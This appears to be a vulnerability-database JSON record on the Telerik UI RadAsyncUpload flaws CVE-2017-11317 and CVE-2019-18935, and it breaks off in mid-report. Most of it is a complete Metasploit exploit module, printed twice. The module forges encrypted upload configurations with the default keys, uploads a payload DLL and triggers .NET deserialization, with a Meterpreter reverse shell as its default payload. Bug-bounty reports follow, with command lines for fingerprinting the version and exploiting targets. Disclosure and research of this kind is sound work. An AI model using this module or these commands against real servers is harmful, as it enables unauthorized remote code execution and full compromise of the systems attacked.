@bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip\n\n# 0day.today [2019-12-18] #", "sourceHref": "https://0day.today/exploit/33683", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2020-10-20T20:37:38", "description": "", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "packetstorm", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-10-20T00:00:00", "id": "PACKETSTORM:159653", "href": "https://packetstormsecurity.com/files/159653/Telerik-UI-ASP.NET-AJAX-RadAsyncUpload-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \nSALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b \n# default keys per CVE-2017-11317 \nDEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze \nDEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze \nCVE_2017_11317_REFERENCES = [ \n['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption \n['URL', 'https://github.com/bao7uo/RAU_crypto'], \n['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'], \n['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'], \n].freeze \nCVE_2019_18935_REFERENCES = 
[ \n['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization \n['URL', 'https://github.com/noperator/CVE-2019-18935'], \n['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'], \n['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'], \n['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'], \n].freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization', \n'Description' => %q{ \nThis module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik \nUI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET \nassembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the \ncryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once \npatched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. \nThis version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915'). 
\n}, \n'Author' => [ \n'Spencer McIntyre', # Metasploit module \n'Paul Taylor', # (@bao7uo) Python PoCs \n'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935 \n'Caleb Gross', # (@noperator) research on CVE-2019-18935 \n'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317 \n'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317 \n'straightblast', # (@straight_blast) discovery of CVE-2017-11317 \n], \n'License' => MSF_LICENSE, \n'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => [['Windows', {}],], \n'Payload' => { 'Space' => 2048 }, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'RPORT' => 443, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935 \n'Notes' => { \n'Reliability' => [UNRELIABLE_SESSION], \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] \n}, \n'Privileged' => true \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]), \nOptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]), \nOptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]), \nOptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]), \nOptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]), \nOptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ]) \n]) \nend \n \ndef dest_file_basename \n@dest_file_name = @dest_file_name || datastore['FILE_NAME'] || Rex::Text.rand_text_alphanumeric(rand(4..35)) + '.dll' \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 
'type' => 'rau' } \n}) \nreturn CheckCode::Safe unless res&.code == 200 \nreturn CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/ \n \nif datastore['VERSION'].blank? \n@version = enumerate_version \nelse \nbegin \nupload_file('', datastore['VERSION']) \nrescue Msf::Exploit::Failed \nreturn CheckCode::Safe \nend \n \n@version = datastore['VERSION'] \nend \n \nif !@version.nil? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY \nprint_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317') \nreport_vuln({ \nhost: rhost, \nport: rport, \nproto: 'tcp', \nname: 'Unrestricted File Upload via Weak Encryption', \nrefs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) } \n}) \nend \n \n# with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it \nCheckCode::Detected \nend \n \ndef exploit \nfail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil? 
\nupload_file(generate_payload_dll({ mixed_mode: true }), @version) \nexecute_payload \nend \n \ndef execute_payload \nprint_status('Executing the payload...') \nserialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" } \nserialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller'] \n \nmsg = rau_mime_payload(serialized_object, serialized_object_type.to_s) \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' }, \n'method' => 'POST', \n'data' => msg.to_s, \n'ctype' => \"multipart/form-data; boundary=#{msg.bound}\" \n}, 5 \n) \n# this request to execute the payload times out on success and returns 200 when it fails, for example because the \n# AllowedCustomMetaDataTypes setting is blocking the necessary code path \nfail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200 \nend \n \ndef upload_file(file_contents, version) \ntarget_folder = encrypt('') \ntemp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE')) \nif (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016 \n# signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing) \ntarget_folder << sign(target_folder) \ntemp_target_folder << sign(temp_target_folder) \nend \n \nserialized_object = { \n'TargetFolder' => target_folder, \n'TempTargetFolder' => temp_target_folder, \n'MaxFileSize' => 0, \n'TimeToLive' => { \n'Ticks' => 1440000000000, \n'Days' => 0, \n'Hours' => 40, \n'Minutes' => 0, \n'Seconds' => 0, \n'Milliseconds' => 0, \n'TotalDays' => 1.6666666666666665, \n'TotalHours' => 40, \n'TotalMinutes' => 2400, \n'TotalSeconds' => 144000, \n'TotalMilliseconds' => 144000000 \n}, \n'UseApplicationPoolImpersonation' => false \n} 
\nserialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\" \n \nmsg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents) \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' }, \n'method' => 'POST', \n'data' => msg.to_s, \n'ctype' => \"multipart/form-data; boundary=#{msg.bound}\" \n} \n) \nfail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200 \nmetadata = JSON.parse(decrypt(res.get_json_document.dig('metaData')).force_encoding('UTF-16LE')) \ndest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\" \nprint_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\") \nregister_file_for_cleanup(dest_path) \nend \n \ndef rau_mime_payload(serialized_object, serialized_object_type, file_contents: '') \nmetadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename } \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(encrypt(serialized_object.to_json.encode('UTF-16LE')) + '&' + encrypt(serialized_object_type.encode('UTF-16LE')), nil, nil, 'form-data; name=\"rauPostData\"') \npost_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\") \npost_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"') \npost_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"') \npost_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"') \npost_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"') \npost_data \nend \n \ndef enumerate_version \nprint_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect') 
\nFile.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version| \nversion.strip! \nnext if version.start_with?('#') \n \nvprint_status(\"Checking version: #{version}\") \nbegin \nupload_file('', version) \nrescue Msf::Exploit::Failed \nnext \nend \n \nprint_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\") \nreturn version \nend \n \nnil \nend \n \n# \n# Crypto Functions \n# \ndef get_cipher(mode) \n# older versions might need to use pbkdf1 \nblob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48) \ncipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode) \ncipher.key = blob.slice(0, 32) \ncipher.iv = blob.slice(32, 48) \ncipher \nend \n \ndef decrypt(cipher_text) \ncipher = get_cipher(:decrypt) \ncipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final \nend \n \ndef encrypt(plain_text) \ncipher = get_cipher(:encrypt) \ncipher_text = '' \ncipher_text << cipher.update(plain_text) unless plain_text.empty? \ncipher_text << cipher.final \nRex::Text.encode_base64(cipher_text) \nend \n \ndef sign(data) \nRex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data)) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/159653/telerik_rau_deserialization.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-08-19T02:45:13", "description": "This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once patched randomizes these keys. 
It is also necessary to know the version of Telerik UI ASP.NET that is running. This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-07T17:40:10", "type": "metasploit", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2021-02-25T14:13:40", "id": "MSF:EXPLOIT-WINDOWS-HTTP-TELERIK_RAU_DESERIALIZATION-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/telerik_rau_deserialization/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b\n # default keys per CVE-2017-11317\n 
DEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze\n DEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze\n CVE_2017_11317_REFERENCES = [\n ['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption\n ['URL', 'https://github.com/bao7uo/RAU_crypto'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'],\n ['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'],\n ].freeze\n CVE_2019_18935_REFERENCES = [\n ['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization\n ['URL', 'https://github.com/noperator/CVE-2019-18935'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'],\n ['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'],\n ['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'],\n ].freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization',\n 'Description' => %q{\n This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. 
'2020.3.915').\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Paul Taylor', # (@bao7uo) Python PoCs\n 'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935\n 'Caleb Gross', # (@noperator) research on CVE-2019-18935\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317\n 'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317\n 'straightblast', # (@straight_blast) discovery of CVE-2017-11317\n ],\n 'License' => MSF_LICENSE,\n 'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Windows', {}],],\n 'Payload' => { 'Space' => 2048 },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935\n 'Notes' => {\n 'Reliability' => [UNRELIABLE_SESSION],\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n },\n 'Privileged' => true\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]),\n OptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]),\n OptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]),\n OptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]),\n OptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ])\n ])\n end\n\n def dest_file_basename\n @dest_file_name = @dest_file_name || datastore['FILE_NAME'] || \"#{Rex::Text.rand_text_alphanumeric(rand(4..35))}.dll\"\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 
'vars_get' => { 'type' => 'rau' }\n })\n return CheckCode::Safe unless res&.code == 200\n return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/\n\n if datastore['VERSION'].blank?\n @version = enumerate_version\n else\n begin\n upload_file('', datastore['VERSION'])\n rescue Msf::Exploit::Failed\n return CheckCode::Safe\n end\n\n @version = datastore['VERSION']\n end\n\n if !@version.nil? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY\n print_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317')\n report_vuln({\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: 'Unrestricted File Upload via Weak Encryption',\n refs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) }\n })\n end\n\n # with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it\n CheckCode::Detected\n end\n\n def exploit\n fail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil?\n upload_file(generate_payload_dll({ mixed_mode: true }), @version)\n execute_payload\n end\n\n def execute_payload\n print_status('Executing the payload...')\n serialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" }\n serialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller']\n\n msg = rau_mime_payload(serialized_object, serialized_object_type.to_s)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }, 5\n )\n # this request to 
execute the payload times out on success and returns 200 when it fails, for example because the\n # AllowedCustomMetaDataTypes setting is blocking the necessary code path\n fail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200\n end\n\n def upload_file(file_contents, version)\n target_folder = encrypt('')\n temp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE'))\n if (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016\n # signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing)\n target_folder << sign(target_folder)\n temp_target_folder << sign(temp_target_folder)\n end\n\n serialized_object = {\n 'TargetFolder' => target_folder,\n 'TempTargetFolder' => temp_target_folder,\n 'MaxFileSize' => 0,\n 'TimeToLive' => {\n 'Ticks' => 1440000000000,\n 'Days' => 0,\n 'Hours' => 40,\n 'Minutes' => 0,\n 'Seconds' => 0,\n 'Milliseconds' => 0,\n 'TotalDays' => 1.6666666666666665,\n 'TotalHours' => 40,\n 'TotalMinutes' => 2400,\n 'TotalSeconds' => 144000,\n 'TotalMilliseconds' => 144000000\n },\n 'UseApplicationPoolImpersonation' => false\n }\n serialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\"\n\n msg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }\n )\n fail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200\n metadata = JSON.parse(decrypt(res.get_json_document['metaData']).force_encoding('UTF-16LE'))\n dest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\"\n print_good(\"Uploaded 
#{file_contents.length} bytes to: #{dest_path}\")\n register_file_for_cleanup(dest_path)\n end\n\n def rau_mime_payload(serialized_object, serialized_object_type, file_contents: '')\n metadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename }\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(\"#{encrypt(serialized_object.to_json.encode('UTF-16LE'))}&#{encrypt(serialized_object_type.encode('UTF-16LE'))}\", nil, nil, 'form-data; name=\"rauPostData\"')\n post_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\")\n post_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"')\n post_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"')\n post_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"')\n post_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"')\n post_data\n end\n\n def enumerate_version\n print_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect')\n File.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version|\n version.strip!\n next if version.start_with?('#')\n\n vprint_status(\"Checking version: #{version}\")\n begin\n upload_file('', version)\n rescue Msf::Exploit::Failed\n next\n end\n\n print_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\")\n return version\n end\n\n nil\n end\n\n #\n # Crypto Functions\n #\n def get_cipher(mode)\n # older versions might need to use pbkdf1\n blob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48)\n cipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode)\n cipher.key = blob.slice(0, 32)\n cipher.iv = blob.slice(32, 48)\n cipher\n end\n\n def decrypt(cipher_text)\n cipher = 
get_cipher(:decrypt)\n cipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final\n end\n\n def encrypt(plain_text)\n cipher = get_cipher(:encrypt)\n cipher_text = ''\n cipher_text << cipher.update(plain_text) unless plain_text.empty?\n cipher_text << cipher.final\n Rex::Text.encode_base64(cipher_text)\n end\n\n def sign(data)\n Rex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data))\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/telerik_rau_deserialization.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2020-08-13T18:53:44", "bounty": 0.0, "description": "**Summary:**\nThe website at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau is vulnerable to CVE-2017-11317 and CVE-2019-18935, allowing an attacker to upload arbitrary files and gain remote code execution on the underlying system.\n\n## Step-by-step Reproduction Instructions\n\n1. Browse to https://\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau. You will see the following message confirming that the file upload handler is registered:\n`{ \"message\" : \"RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly.\" }`\n2. From here on out I used the write-up at https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui for reference.\n3. 
With a slight modification to the script in the BishopFox write-up, I was able to determine the software version:\n\n```\necho 'test' > testfile.txt\nfor VERSION in $(cat versions.txt); do\n echo -n \"$VERSION: \"\n python3 RAU_crypto.py -P 'C:\\Windows\\Temp' \"$VERSION\" testfile.txt https://\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau 2>/dev/null | grep fileInfo || echo\n done\n```\nThe `versions.txt` file I used has been attached to this report for ease of replication.\n4. As shown in the results, the version is vulnerable to CVE-2017-11317 and I was able to successfully upload the `testfile.txt`.\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n5. Next, on a Windows system with Visual Studio installed, compile a dll using `build_dll.bat` as shown in the BishopFox article.\n6. Using `python3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau -v 2016.2.607 -f 'C:\\Windows\\Temp' -p <your_created_dll>.dll`, if you compiled using the PoC in the article you should be able to make the server hang for around 10 seconds. \n7. Once the sleep is over, the server should respond with a similar message as follows: `[*] Response time: 12.34 seconds` showing the server is vulnerable to CVE-2019-18935.\n8. 
At this point you can upload a reverse shell payload, but I feel the sleep PoC is good enough to prove RCE.\n\n## Product, Version, and Configuration (If applicable)\nTelerik UI 2016.2.607\n\n## References\nhttps://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui\nhttps://github.com/bao7uo/RAU_crypto\nhttps://github.com/noperator/CVE-2019-18935\nhttps://hackerone.com/reports/838196\n\n## Suggested Mitigation/Remediation Actions\nFollow recommended fix actions at https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization\n\n## Impact\n\nRemote Code Execution/Total system compromise.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-02T08:13:07", "type": "hackerone", "title": "U.S. 
Dept Of Defense: Remote Code Execution via CVE-2019-18935", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-08-13T18:11:22", "id": "H1:913695", "href": "https://hackerone.com/reports/913695", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T17:56:52", "bounty": 0.0, "description": "Hello,\nI found an outdated version of Telerik Web UI (v2016.2.607.40) at the following URL: https://\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau.\nThis means that we can achieve full RCE by chaining two different CVEs: CVE-2017-11317, which allows us to upload arbitrary files on the server, and CVE-2019-18935, which is a deserialization vulnerability.\n\nFirst of all, the only thing that I tried to prove that I had successfully achieved code execution was making the server sleep for 10 seconds.\nNo data was compromised.\n\nSteps to reproduce\n---------------------\nThe steps that I followed are thoroughly described in this blog post: <https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>.\nHere's a quick summary:\n- Download the files in the attachments\n- Make sure you have pycryptodome installed (pip3 install pycryptodome)\n- Run the following command: `python3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau -v 2016.2.607.40 -f 'C:\\Windows\\Temp' -p sleep_042020163752,45_amd64.dll`\n- The `sleep_042020160430,40_amd64.dll` is 
